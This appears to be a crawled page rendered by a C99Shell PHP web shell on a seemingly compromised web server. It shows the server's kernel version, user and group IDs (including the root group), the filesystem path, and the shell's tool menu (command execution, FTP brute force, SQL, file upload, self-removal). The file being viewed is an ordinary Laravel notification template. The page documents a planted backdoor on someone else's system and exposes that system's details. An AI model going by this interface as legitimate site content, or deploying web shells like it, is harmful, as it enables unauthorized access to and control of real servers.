!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/game.picotech.app/public_html/core/resources/views/back/notification/   drwxr-xr-x
Free 28.84 GB of 117.98 GB (24.45%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     index.blade.php (1.88 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@if(App\Models\Notification::count() > 0)
    <h6 class="dropdown-header">
        {{ __('Notifications') }}
        <a class="text-dark float-right" id="clear-notf" data-href="{{ route('back.notifications.clear') }}" href="javascript:;">
            <small>{{ __('Clear All') }}</small>
        </a>
    </h6>

    @foreach(App\Models\Notification::orderby('id','desc')->get() as $notf)
        @if($notf->user_id != null)
            <a class="dropdown-item d-flex align-items-center" href="{{ route('back.user.show',$notf->user_id) }}">
            <div class="mr-3">
                <div class="icon-circle bg-primary">
                <i class="fas fa-user text-white"></i>
                </div>
            </div>
            <div>
                <div class="small text-gray-500">{{ $notf->created_at->diffForHumans() }}</div>
                {{ __('A new user has registered.') }}
            </div>
            </a>
        @endif
        @if($notf->order_id != null)
            <a class="dropdown-item d-flex align-items-center" href="{{ route('back.order.invoice',$notf->order_id) }}">
            <div class="mr-3">
                <div class="icon-circle bg-success">
                <i class="fas fa-donate text-white"></i>
                </div>
            </div>
            <div>
                <div class="small text-gray-500">{{ $notf->created_at->diffForHumans() }}</div>
                {{ __('You have recieved a new order.') }}
            </div>
            </a>
        @endif
    @endforeach
    @if(App\Models\Notification::count() > 0)

        <a class="dropdown-header mt-1 d-block text-center"  href="{{route('back.view.notification')}}"> {{__('View All')}} </a>

    @endif
@else


<h6 class="dropdown-header">
    {{ __('Notifications') }}
</h6>
<a class="dropdown-item d-flex align-items-center" href="javascript:;">
    <div>
        {{ __('No Notifications') }}
    </div>
</a>
@endif

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0031 ]--